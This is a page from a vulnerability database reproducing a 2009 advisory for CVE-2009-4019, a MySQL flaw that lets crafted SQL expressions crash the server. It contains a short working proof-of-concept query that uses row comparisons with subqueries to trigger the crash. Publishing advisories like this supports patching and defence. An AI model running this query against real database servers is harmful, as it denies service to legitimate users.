Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2009-4019

Publish Date: 23 Nov 2009

                							

                source: http://www.securityfocus.com/bid/37297/info

MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.

An attacker can exploit these issues to crash the application, denying access to legitimate users.

Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. 

drop table if exists `t1`;
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select  1 from `t1`
where
`a` &lt;&gt; '1' and not
row(`a`,`a`) &lt;=&gt;
row((select 1 from `t1` where 1=2),(select 1 from `t1`)) 
into @`var0`;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service

Vulmon Search

About

Products

Connect